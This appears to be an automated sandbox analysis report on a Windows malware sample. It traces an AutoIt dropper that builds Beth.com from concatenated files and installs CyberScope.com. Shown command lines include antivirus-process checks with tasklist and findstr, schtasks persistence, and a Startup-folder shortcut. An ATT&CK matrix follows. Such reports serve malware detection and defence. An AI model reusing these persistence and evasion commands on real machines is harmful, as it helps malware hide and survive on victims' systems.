    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: nikDoCvpJa.exeStatic file information: File size 1798791 > 1048576
    Source: nikDoCvpJa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
    Source: nikDoCvpJa.exeStatic PE information: real checksum: 0x1bd2b5 should be: 0x1b99a6
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001E02DB push cs; retn 001Dh19_2_001E0318
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001B0DE6 push ecx; ret 19_2_001B0DF9

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comFile created: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\638933\Beth.comJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comFile created: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\638933\Beth.comJump to dropped file

    Boot Survival

    barindex
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /F
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberScope.urlJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberScope.urlJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_002226DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,19_2_002226DD
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001AFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,19_2_001AFC7C
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_19-105252
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comWindow / User API: threadDelayed 2912Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comWindow / User API: threadDelayed 6509Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comWindow / User API: foregroundWindowGot 1769Jump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comAPI coverage: 4.1 %
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.com TID: 4308Thread sleep time: -143500s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.com TID: 1532Thread sleep time: -8736000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.com TID: 1532Thread sleep time: -19527000s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_0020A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0020A087
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_0020A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0020A1E2
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001FE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,19_2_001FE472
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_0020A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_0020A570
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001CC622 FindFirstFileExW,19_2_001CC622
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_002066DC FindFirstFileW,FindNextFileW,FindClose,19_2_002066DC
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_00207333 FindFirstFileW,FindClose,19_2_00207333
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_002073D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,19_2_002073D4
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001FD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_001FD921
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001FDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_001FDC54
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_00195FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,19_2_00195FC8
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\638933Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\638933\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_0020F4FF BlockInput,19_2_0020F4FF
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_0019338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_0019338B
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001B5058 mov eax, dword ptr fs:[00000030h]19_2_001B5058
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001F20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,19_2_001F20AA
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001C2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_001C2992
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001B0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_001B0BAF
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001B0D45 SetUnhandledExceptionFilter,19_2_001B0D45
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001B0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_001B0F91
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001F1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,19_2_001F1B4D
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_0019338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_0019338B
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001FBBED SendInput,keybd_event,19_2_001FBBED
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001FEC6C mouse_event,19_2_001FEC6C
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cab Cab.cmd & Cab.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 638933Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Chosen" Bugs Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Wichita + ..\Sign + ..\Idol + ..\Lauren + ..\Rice + ..\Bold + ..\Loops + ..\Shore + ..\Marie gJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\638933\Beth.com Beth.com gJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /FJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com" "C:\Users\user\AppData\Local\SecureScope Dynamics\r"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com" "C:\Users\user\AppData\Local\SecureScope Dynamics\r"Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cyberscope.url" & echo url="c:\users\user\appdata\local\securescope dynamics\cyberscope.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cyberscope.url" & exit
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cyberscope.url" & echo url="c:\users\user\appdata\local\securescope dynamics\cyberscope.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cyberscope.url" & exitJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001F14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,19_2_001F14AE
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001F1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,19_2_001F1FB0
    Source: Beth.com, 0000000B.00000003.2169196998.00000000041B5000.00000004.00000800.00020000.00000000.sdmp, Beth.com, 0000000B.00000000.2161991478.0000000000883000.00000002.00000001.01000000.00000007.sdmp, CyberScope.com, 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: CyberScope.comBinary or memory string: Shell_TrayWnd
    Source: registros.dat.11.drBinary or memory string: [2024/12/19 17:42:57 Program Manager]
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001B0A08 cpuid 19_2_001B0A08
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001EE5F4 GetLocalTime,19_2_001EE5F4
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001EE652 GetUserNameW,19_2_001EE652
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001CBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,19_2_001CBCD2
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: C:\ProgramData\data\registros.dat, type: DROPPED
    Source: CyberScope.comBinary or memory string: WIN_81
    Source: CyberScope.comBinary or memory string: WIN_XP
    Source: Nearby.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progre
    Source: CyberScope.com.11.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
    Source: CyberScope.comBinary or memory string: WIN_XPe
    Source: CyberScope.comBinary or memory string: WIN_VISTA
    Source: CyberScope.comBinary or memory string: WIN_7
    Source: CyberScope.comBinary or memory string: WIN_8

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: C:\ProgramData\data\registros.dat, type: DROPPED
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_00212263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,19_2_00212263
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_00211C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,19_2_00211C61
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information11
    Scripting
    2
    Valid Accounts
    1
    Windows Management Instrumentation
    11
    Scripting
    1
    Exploitation for Privilege Escalation
    1
    Disable or Modify Tools
    121
    Input Capture
    2
    System Time Discovery
    Remote Services1
    Archive Collected Data
    2
    Ingress Tool Transfer
    Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    Native API
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Deobfuscate/Decode Files or Information
    LSASS Memory1
    Account Discovery
    Remote Desktop Protocol121
    Input Capture
    1
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Command and Scripting Interpreter
    2
    Valid Accounts
    2
    Valid Accounts
    2
    Obfuscated Files or Information
    Security Account Manager3
    File and Directory Discovery
    SMB/Windows Admin Shares3
    Clipboard Data
    1
    Non-Standard Port
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    Scheduled Task/Job
    1
    Scheduled Task/Job
    21
    Access Token Manipulation
    1
    Software Packing
    NTDS17
    System Information Discovery
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchd2
    Registry Run Keys / Startup Folder
    12
    Process Injection
    1
    DLL Side-Loading
    LSA Secrets12
    Security Software Discovery
    SSHKeylogging2
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
    Scheduled Task/Job
    111
    Masquerading
    Cached Domain Credentials11
    Virtualization/Sandbox Evasion
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
    Registry Run Keys / Startup Folder
    2
    Valid Accounts
    DCSync4
    Process Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
    Virtualization/Sandbox Evasion
    Proc Filesystem11
    Application Window Discovery
    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
    Access Token Manipulation
    /etc/passwd and /etc/shadow1
    System Owner/User Discovery
    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
    Process Injection
    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
